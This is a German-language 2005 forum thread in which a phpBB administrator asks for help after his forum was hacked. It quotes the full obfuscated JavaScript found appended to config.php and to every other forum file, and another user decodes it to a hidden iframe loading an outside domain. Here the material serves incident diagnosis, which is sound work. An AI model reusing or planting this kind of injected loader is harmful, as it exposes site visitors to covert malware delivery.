Seite 1 von 1

HILFE! gehackt worden?!

Verfasst: 21.07.2005 22:15
von DeepThought
Hallo!
ich habe da ein kleines Problem.
Seit gestern sieht mein Forum aus wie unten im Bild. die Meldungen oben sollten da nicht sein. ausserdem werden einige java applets gestartet und wenn man das ganze mit dem ie betritt ruft sich staendig der internetverbindungsdienst auf.
sieht wohl nach hack aus.

koennte mir bitte jemand sagen, was ich nun tun kann?
foren version ist 2.0.6. ich weiss, ich bin selbst dran schuld, weil ich die ganzen updates nicht geladen habe, aber das forum war fuer einige zeit in vergessenheit...bitte hilfe!

danke im voraus!

[ externes Bild ]

Verfasst: 21.07.2005 22:36
von Mario Siebert
Wegen der Fehlermeldung, überprüf mal ob in deiner config.php vor <?php oder nach ?> leerzeilen sind, wenn ja entfern sie.

Grüße Mario

Verfasst: 21.07.2005 22:53
von DeepThought
nein leerzeichen sind da keine aber da steht
`<script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%286Fliudph%2853vuf%286Gkwws%286D22wudi1vq0qhw1lqir2lqgh%7B1sks%2853iudpherughu%286G3%2853zlgwk%286G3%2853khljkw%286G3%2853vfuroolqj%286Gqr%2853qdph%286Gfrxqwhu%286H%286F2liudph%286H3')</script>`

hinter ?> und ich bezweifle dass das da hingehoert, oder?

Verfasst: 21.07.2005 23:56
von Mario Siebert
Nein, das gehört da nicht hin, hier findest du ein Beispiel wie die config.php aussehen muss KB:config

Grüße Mario

Verfasst: 22.07.2005 00:16
von kellanved
DeepThought hat geschrieben: ...und ich bezweifle dass das da hingehoert, oder?
Nein, aber wenn Du wissen willst, was sich in diesem Buchstabensalat versteckte:

Code: Alles auswählen

<iframe src=http://praf.sn-nei.info/index.php frameborder= width= height= scrolling= name=counter></iframe>

Verfasst: 22.07.2005 00:42
von DeepThought
ok, ansonsten sieht sie so aus.

so, nur wenn ich diese zeile rausloesche, dann aendert sich rein gar nichts :(

also muessen sich ja wohl noch mehr solche sachen eingeschlichen haben. wie krieg ich die jetzt alle wieder weg? :-?

danke!

Verfasst: 22.07.2005 00:43
von Christian Benz

Verfasst: 22.07.2005 00:48
von DeepThought
also so wies aussieht steht das in jeder html und in jeder php datei die fuers forum zustaenig ist am ende drin.
2 fragen:

-gibts ne andere moeglichkeit das rauszukriegen, als die zeile in jeder einzelnen datei zu loeschen?

-wie zum teufel kommt das da hin? und wie kann ich es in zukunft vermeiden?

Verfasst: 22.07.2005 00:49
von DeepThought
Christian Benz hat geschrieben:Hallo,

Mein Forum wurde gecrackt - was nun?

Gruß,
Chris
ah, danke!

dann hat sich auch mein post von eben erledigt...